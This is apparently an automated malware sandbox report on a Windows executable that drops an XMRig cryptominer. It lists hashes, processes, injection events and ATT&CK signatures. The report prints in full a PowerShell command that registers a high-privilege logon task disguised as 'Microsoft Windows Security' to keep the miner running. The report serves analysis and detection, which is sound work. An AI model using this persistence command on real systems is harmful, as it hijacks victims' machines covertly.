Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/10/2024, 00:09
Behavioral task
behavioral1
Sample
0x0006000000016d4e-54.exe
Resource
win7-20240903-en
General
-
Target
0x0006000000016d4e-54.exe
-
Size
10KB
-
MD5
96509ab828867d81c1693b614b22f41d
-
SHA1
c5f82005dbda43cedd86708cc5fc3635a781a67e
-
SHA256
a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
-
SHA512
ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
-
SSDEEP
96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 2640 created 1236 2640 3621011599.exe 21 PID 2640 created 1236 2640 3621011599.exe 21 PID 1948 created 1236 1948 winupsecvmgr.exe 21 PID 1948 created 1236 1948 winupsecvmgr.exe 21 PID 1948 created 1236 1948 winupsecvmgr.exe 21 -
Xmrig family
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/1948-36-0x000000013F510000-0x000000013FAA7000-memory.dmp xmrig behavioral1/memory/1268-39-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-41-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-43-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-45-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-47-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-49-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-51-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-53-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-55-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-57-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-59-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1268-61-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 2640 3621011599.exe 1948 winupsecvmgr.exe -
Loads dropped DLL 2 IoCs
pid Process 1564 0x0006000000016d4e-54.exe 3012 taskeng.exe -
pid Process 2804 powershell.exe 2708 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1948 set thread context of 992 1948 winupsecvmgr.exe 41 PID 1948 set thread context of 1268 1948 winupsecvmgr.exe 42 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0x0006000000016d4e-54.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2408 schtasks.exe 1936 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2640 3621011599.exe 2640 3621011599.exe 2804 powershell.exe 2640 3621011599.exe 2640 3621011599.exe 1948 winupsecvmgr.exe 1948 winupsecvmgr.exe 2708 powershell.exe 1948 winupsecvmgr.exe 1948 winupsecvmgr.exe 1948 winupsecvmgr.exe 1948 winupsecvmgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeLockMemoryPrivilege 1268 dwm.exe Token: SeLockMemoryPrivilege 1268 dwm.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe 1268 dwm.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1564 wrote to memory of 2640 1564 0x0006000000016d4e-54.exe 30 PID 1564 wrote to memory of 2640 1564 0x0006000000016d4e-54.exe 30 PID 1564 wrote to memory of 2640 1564 0x0006000000016d4e-54.exe 30 PID 1564 wrote to memory of 2640 1564 0x0006000000016d4e-54.exe 30 PID 2804 wrote to memory of 2408 2804 powershell.exe 33 PID 2804 wrote to memory of 2408 2804 powershell.exe 33 PID 2804 wrote to memory of 2408 2804 powershell.exe 33 PID 3012 wrote to memory of 1948 3012 taskeng.exe 37 PID 3012 wrote to memory of 1948 3012 taskeng.exe 37 PID 3012 wrote to memory of 1948 3012 taskeng.exe 37 PID 2708 wrote to memory of 1936 2708 powershell.exe 40 PID 2708 wrote to memory of 1936 2708 powershell.exe 40 PID 2708 wrote to memory of 1936 2708 powershell.exe 40 PID 1948 wrote to memory of 992 1948 winupsecvmgr.exe 41 PID 1948 wrote to memory of 1268 1948 winupsecvmgr.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe"C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\3621011599.exeC:\Users\Admin\AppData\Local\Temp\3621011599.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2640
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2408
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1936
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:992
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1268
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {ED16319A-B46C-4A9C-8A20-01941478863C} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1948
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD566a8cf3f9cb8348dcfc201eb2d42924a
SHA1fd04f7e8f6ca208c03662f4d3f1324d686a732ce
SHA256798c8fddd54b5f0812c9b0428176e8cad353616d8541d4c2f9625338f6cf28b7
SHA512dc9c41cab8cf34f7ac5b2649b62d0bda5251765395b15d16f39442d091e018d0aae656b51858b237ccdfc826e09eedc13267fdbc26cc086e133d2026e8b240a3
-
Filesize
5.6MB
MD513b26b2c7048a92d6a843c1302618fad
SHA189c2dfc01ac12ef2704c7669844ec69f1700c1ca
SHA2561753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256
SHA512d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455